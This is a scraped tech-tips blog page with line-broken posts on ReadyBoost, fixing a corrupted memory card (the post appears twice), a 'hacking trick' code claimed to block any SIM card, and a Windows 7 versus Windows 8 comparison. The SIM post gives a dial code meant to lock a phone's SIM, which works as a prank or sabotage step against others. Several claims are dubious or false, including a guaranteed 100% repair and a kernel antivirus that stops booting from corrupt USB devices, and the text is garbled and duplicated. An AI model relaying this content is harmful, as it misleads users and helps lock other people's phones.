Plug in your pendrive-> Format with NTFS
or FAT32
Now go to properties->Select ReadyBoost
Check Use this device->Choose maximum
space to reserve system speed
Click on Apply and OK. Your readyboost
PenDrive is ready Now to Use.
Here is an personal suggestion HP and
Sandisk is the Best for this work so what
are you waiting for.

How To Fix a Corrupted Memory Card Pro Mobile tricks For Noobs Beginer 2013

0 comments
How To Fix a Corrupted Memory
Card.
Before dumping any memory card into
garbage,
always give it a last try. Who knows, may
be your
card reader or phone has the ultimate
problem. So
now, all you have to do is to check whether
your
memory card is really corrupted or not.
Check in
your memory card with the help of a
memory card reader, or a phone. If your
memory card is
detected, then follow the following steps
to recover
it back. Procedure 1 to fix a corrupted
memory card: 1) Connect your memory
card to your PC and check
the drive which is showing the location of
your
card.
2) Right click on your memory card drive
and go to
properties.
3) Click on Format button, you can see a
pop up box showing the file system as FAT.
Usually the
memory cards support only FAT files.
4) Click on the start button but don’t
check the
quick format option, just leave it blank.
5) Check your memory card if its fixed. If
not, move
on to Procedure 2 to fix a corrupted
memory card: 1) Open RUN by pressing
Ctrl+R and type CMD and
then press enter.
2) Now if the memory card drive. Say for
example,
my drive is L: then type L: and press enter.
3) Now type as format L: and press enter.
4) You will be asked for a conformation and
enter your decision by pressing y or n.
Which mean yes
or no. Simply press y and wait until the
format is
finished.
5) This will create default clusters in your
memory
card and give your memory card a 100%
success
rate to work normally. Note: We would
suggest you to format the memory
card in your phone once for better
adjustments of
the phone settings.

How To Fix a Corrupted Memory Card Pro Mobile tricks For Noobs Beginer 2013

0 comments
How To Fix a Corrupted Memory
Card.
Before dumping any memory card into
garbage,
always give it a last try. Who knows, may
be your
card reader or phone has the ultimate
problem. So
now, all you have to do is to check whether
your
memory card is really corrupted or not.
Check in
your memory card with the help of a
memory card reader, or a phone. If your
memory card is
detected, then follow the following steps
to recover
it back. Procedure 1 to fix a corrupted
memory card: 1) Connect your memory
card to your PC and check
the drive which is showing the location of
your
card.
2) Right click on your memory card drive
and go to
properties.
3) Click on Format button, you can see a
pop up box showing the file system as FAT.
Usually the
memory cards support only FAT files.
4) Click on the start button but don’t
check the
quick format option, just leave it blank.
5) Check your memory card if its fixed. If
not, move
on to Procedure 2 to fix a corrupted
memory card: 1) Open RUN by pressing
Ctrl+R and type CMD and
then press enter.
2) Now if the memory card drive. Say for
example,
my drive is L: then type L: and press enter.
3) Now type as format L: and press enter.
4) You will be asked for a conformation and
enter your decision by pressing y or n.
Which mean yes
or no. Simply press y and wait until the
format is
finished.
5) This will create default clusters in your
memory
card and give your memory card a 100%
success
rate to work normally. Note: We would
suggest you to format the memory
card in your phone once for better
adjustments of
the phone settings.

Block any Sim with this Code Pro Mobile hacking Tricks for noobs

0 comments
locking sim card

Block any Sim with this Code.

*04*3814*7529*68243#

To unblock the sim call customer care and get the puk code

Main Differences between windows 7 and windows 8

0 comments
Main Differences between
windows
7 and windows 8
1)boot time: win7 48 sec. win8
10
sec. 2)desktop : Microsoft has
replaced
the normal shortcut icons with
dynamic tiles. You can change
their
size and place similar applications
around each other- or
anything else
that my suit you.
3)mounting iso images:
Windows 7 could only burn an ISO image
to a
DVD but Windows 8 actually
betters
this by offering you the
option to mount the image too. In
Windows
7, you didn’t have the option
to
make virtual drives to use the
ISO image’s content but Windows
8
allows you to
create a virtual drive to mount
the
ISO image so that you can easily use
it just like a normal DVD.
4)Built-in Antivirus(bad news
for
hackers): Windows 8 has an
antivirus present inside the kernel
of the operating system. This
means
that
your system won’t boot if a
corrupt USB device is plugged in. It
sounds
impressive though I don’t
know
whether it would pass the test
of time…. and viruses! All in all, I
do
expect Windows 8 to be a
serious
upgrade on Windows 7 and
with Microsoft working on the
things
that require some tweaking; I
genuinely believe that
Microsoft is
finally ready to launch an OS which
will take the world by storm
5)Multiple monitors support in
Windows : Microsoft
announced that
customers can use more thanone
monitor to connect with
Windows 8
operating system. Windows 8
PC
management allows customers to
use multiple monitors at same
time.
It means Windows 8 offers
flexibility by allowing start
screen at one monitor and desktop in
another. Customer can also
choose
taskbar on both screens with
different icons on each
monitor. Moreover, you can play with
background images as well by
changing it separate on each
monitor. Such support is not
available with Windows 7
operating system.
6)Windows based apps store
Windows 8 operating system
introduces new app store in
which
different apps is implementedfor
various devices and settingson
right
of the screen. The settings
section
includes contextual apps like volume,
brightness, restart
and
power options. You can share
content, links, app reviews,
contacts, metro apps,
Facebook and twitter applications with your
friends or colleagues. Windows
8
store offers both desktop apps
and
ecosystem for developers. On the
other hand, Windows 7 OS is
missing all these features.
7)Inbuilt Windows Touch
features:
The main difference between Windows 7
and Windows 8
comes
with its metro style interface
that
provides live title of rectangle
shape which has replaced theicon
pattern
in Windows
8. In Windows 7 operating
system,
software shortcuts are in theform
of icons. As far as the touch
interface is concerned then
Windows
9) supports touch interface but
not that much, what was
expected. So,
Windows 8 comes with true
touch
interface for Metro style apps.
It is fast way of accessing data by
using
an improved on-screen
keyboard
and handwriting recognition
 
Copyright © PC Tricks